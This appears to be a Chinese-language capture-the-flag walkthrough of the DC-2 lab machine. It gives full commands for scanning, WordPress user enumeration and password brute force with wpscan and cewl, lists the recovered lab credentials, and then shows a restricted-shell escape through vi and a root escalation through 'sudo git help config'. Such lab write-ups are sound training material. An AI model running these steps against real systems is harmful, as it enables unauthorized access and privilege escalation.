扫描信息
DC-2的mac地址为- netdiscover
- arp-scan -l
得出DC-2的地址为192.168.150.151
nmap -p- -sV -sT -A -O 192.168.150.151
把IP 和域名写入 hosts 文件中
sudo nano /etc/hosts
访问http://192.168.150.151/
对网站做一个目录扫描
dirb http://dc-2/
发现后台
http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
用户名枚举
前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描 Wpscan一些常用语句wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户
扫描wordpress版本
wpscan --url http://dc-2
发现是4.7.10版本
现在开始尝试登入
随便输入一个账号密码发现是无用的用户
来个用户枚举,再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u
发现三个用户
暴力破解出账号密码
可以用burp抓包,也可以简单点因为知道了是wpscan
所以 使用cewl生成字典,使用wpscan进行暴力破解
cewl http://dc-2 . > .1.txt
wpscan --url http://dc-2 --passwords 1.txt
得到的结果m
jerry adipiscing
tom parturient
登入账号
jerry/adipiscing登录此站点发现
使用ssh登入
```plain ssh tom@192.168.150.151 -p 7744 jerry/adipiscing tom/parturient ```查看一下权限
whoami发现有rbash限制(可以理解为很低权限的用户吧)
vi进入编辑器
然后按Esc键,输入
:set shell=/bin/bash
然后回车输入:shell
最后回车退出
可以发现权限升级为bash
vi随便打开文件
再下面添加
:set shell=/bin/sh
:shell
已经升级为bash了,无法执行cat命令是因为环境变量的问题,用以下命令添加一下两条路径即可
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
。。
查看flag4.txt
export -p //查看环境变量
BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/ //添加环境变量
export PATH=$PATH:/usr/bin //添加环境变量
提权成功
x
切换用户
![](https://img-blog.csdnimg.cn/img_convert/b64cb3420a318e1910dd09eff327270e.png)sudo -l
然后开始提权
sudo git help config
回车输入
!/bin/bash
成功切换root用户
cd / 进入根目录find / -name flag
寻找flag文件
cat /root/final*
总结
1字典生成工具cewl
利用爬虫爬取网站,根据网站特点生成字典2扫描工具WPScan(只适用于WordPress)
> [Kali(渗透工具):WPScan的使用(WordPress扫描工具) - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/149725645) >- 用户名枚举
wpscan --url 网站地址 -e u
-e表示枚举类型,u表示用户名。这两个配合使用是枚举用户名
- 密码爆破
wpscan --url 网站地址 -U 用户名字典 -P 密码字典
3. Linux的一些命令
+ ** 编辑器命令**vi(或vim)
可配合提权操作,进去后,按Esc键可执行操作,输入一下命令
:set shell=/bin/bash(bash可以用sh代替)
:shell
- 环境变量查看(一般用于查看可执行命令)
echo $PATH
记住$PATH的值,比如输出/home/jerry/bin
echo path路径下的文件
- 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
- 用户切换
su 用户名